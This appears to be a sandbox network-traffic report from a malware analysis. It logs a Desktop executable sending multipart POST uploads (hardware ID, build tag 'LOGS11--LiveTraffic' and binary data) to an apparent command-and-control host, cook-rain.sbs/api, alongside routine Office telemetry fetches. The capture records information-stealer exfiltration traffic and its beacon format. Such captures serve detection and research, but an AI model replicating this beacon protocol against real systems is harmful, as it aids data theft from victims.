                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      14192.168.2.749718104.21.66.384437476C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=Q40ACO3KKLQ0IK8OSUC
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Length: 15088
                                                                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC15088OUTData Raw: 2d 2d 51 34 30 41 43 4f 33 4b 4b 4c 51 30 49 4b 38 4f 53 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 32 32 38 38 35 46 32 31 41 36 46 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 51 34 30 41 43 4f 33 4b 4b 4c 51 30 49 4b 38 4f 53 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 34 30 41 43 4f 33 4b 4b 4c 51 30 49 4b 38 4f 53 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                                      Data Ascii: --Q40ACO3KKLQ0IK8OSUCContent-Disposition: form-data; name="hwid"F5D22885F21A6F1063CFCF7E6C45F838--Q40ACO3KKLQ0IK8OSUCContent-Disposition: form-data; name="pid"2--Q40ACO3KKLQ0IK8OSUCContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                                                                      2024-11-20 16:41:29 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:29 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=lg0smmjg5s4tv4g7va8m1te749; expires=Sun, 16-Mar-2025 10:28:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=33VhodJ94d15ZJ4UTyYGX5zXRgO16IqXxdwpiRi12vILACKxJPH9t0P3RT029f8lChqeMBzHpfqA9ezJ1X8hhUuaF0N%2FSVUZ4Cq9coDbJZNFqEJXTe%2BTul31x0W6PZM6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8e59e34488e77ca2-EWR
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1937&sent=12&recv=18&lost=0&retrans=0&sent_bytes=2829&recv_bytes=16026&delivery_rate=1454907&cwnd=245&unsent_bytes=0&cid=b2f904b14f5fb565&ts=965&x=0"
                                                                                                                                                                                                                      2024-11-20 16:41:29 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                      2024-11-20 16:41:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      15192.168.2.74972213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:30 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:30 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                      x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164130Z-185f5d8b95c68cvnhC1NYCfn7s0000000afg00000000hx4n
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      16192.168.2.74972013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:30 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:30 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                      x-ms-request-id: 79148a84-101e-0017-578c-3a47c7000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164130Z-185f5d8b95cjbkr4hC1NYCeu240000000ac000000000bp66
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      17192.168.2.74971913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:30 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:30 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 467
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                      x-ms-request-id: 7f65a9a1-801e-0067-788c-3afe30000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164130Z-r1d97b99577n4dznhC1TEBc1qw000000095000000000c6rc
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      18192.168.2.74972313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:30 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:30 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                      x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164130Z-185f5d8b95cx9g8lhC1NYCtgvc00000002xg000000004zmy
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      19192.168.2.74972113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:30 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:31 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                      x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164131Z-1777c6cb754whff4hC1TEBcd6c00000008bg00000000yz1b
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      20192.168.2.749724104.21.66.384437476C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=U04GE9HQJ7A3J
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Length: 20377
                                                                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC15331OUTData Raw: 2d 2d 55 30 34 47 45 39 48 51 4a 37 41 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 32 32 38 38 35 46 32 31 41 36 46 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 55 30 34 47 45 39 48 51 4a 37 41 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 30 34 47 45 39 48 51 4a 37 41 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 55 30 34 47 45
                                                                                                                                                                                                                      Data Ascii: --U04GE9HQJ7A3JContent-Disposition: form-data; name="hwid"F5D22885F21A6F1063CFCF7E6C45F838--U04GE9HQJ7A3JContent-Disposition: form-data; name="pid"3--U04GE9HQJ7A3JContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--U04GE
                                                                                                                                                                                                                      2024-11-20 16:41:31 UTC5046OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                                                                                                                                      2024-11-20 16:41:32 UTC994INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:32 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=k7rhfh4khtrspn2cshcjg1jo16; expires=Sun, 16-Mar-2025 10:28:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UstESjzZ1%2FAh1LUxtD1f6kk4wkt4K2hTaX64WwFZi3oihaQFaC9ptOb7FMPkmRjuLtRV%2BCCQpsFQ%2FD%2Bwrh0%2Bxm5HvHWgsU8a4kt%2BzFV7fzcXJd1M%2B%2Bea7mHZwddxbVEw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8e59e354afa17286-EWR
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1792&sent=15&recv=27&lost=0&retrans=1&sent_bytes=4198&recv_bytes=21331&delivery_rate=155708&cwnd=240&unsent_bytes=0&cid=d96fa62d9df79446&ts=1183&x=0"
                                                                                                                                                                                                                      2024-11-20 16:41:32 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                      2024-11-20 16:41:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      21192.168.2.74972513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:32 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:33 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                      x-ms-request-id: b82db720-b01e-0053-528c-3acdf8000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164133Z-1777c6cb754xlpjshC1TEBv8cc00000009yg00000000mbx3
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
